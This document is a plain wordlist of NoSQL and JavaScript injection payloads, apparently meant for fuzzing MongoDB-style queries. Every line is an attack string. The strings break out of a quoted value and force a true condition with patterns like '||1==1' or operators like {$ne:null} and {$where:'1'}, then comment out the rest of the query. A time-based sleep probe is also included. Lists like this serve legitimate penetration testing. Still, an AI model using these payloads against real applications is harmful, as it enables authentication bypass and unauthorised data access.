'||1==1//
'||1==1#
'||1==1--
'||1==1'//
'||1==1'#
'||1==1'--
'||1||'
'||true||'
'||'a'=='a
'||'a'=='a'//
'||'a'=='a'#
'||'a'=='a'--
'||'1'=='1
'||'1'=='1'//
'||'1'=='1'#
'||'1'=='1'--
'||1<2
'||1<2//
'||1<2#
'||1<2--
'||1>0
'||1>0//
'||1>0#
'||1>0--
'||0==0//
'||0==0#
'||0==0--
'||true
'||true//
'||true#
'||true--
'||false||true
'||false||true//
'||false||true#
'||false||true--
'||true||false//
'||true||false#
'||true||false--
';return true;//
';return true;#
';return true;--
';{$ne:null}//
';{$ne:null}#
';{$ne:null}--
';{$gt:[0,0]}//
';{$gt:[0,0]}#
';{$gt:[0,0]}--
' || {$regex:""}//
' || {$regex:""}#
' || {$regex:""}--
';[1]//
';[1]#
';[1]--
'||{$where:"1"}//
'||{$where:"1"}#
'||{$where:"1"}--
'||*/||1==1/*//
'/*comment*/||1==1//
';--)||1==1//
';-- -||1==1//
"||1==1//
"||1==1#
"||1==1--
"||'1'=='1'//
"||true//
"||1<2#
';{$exists:true}//
';{$ne:1}//
';{$in:[1]}//
';{$nin:[0]}//
';{$mod:[1,0]}//
';{$all:[1]}//
';1==1//
';true//
' or 1==1//
' or true//
';sleep(1)==1//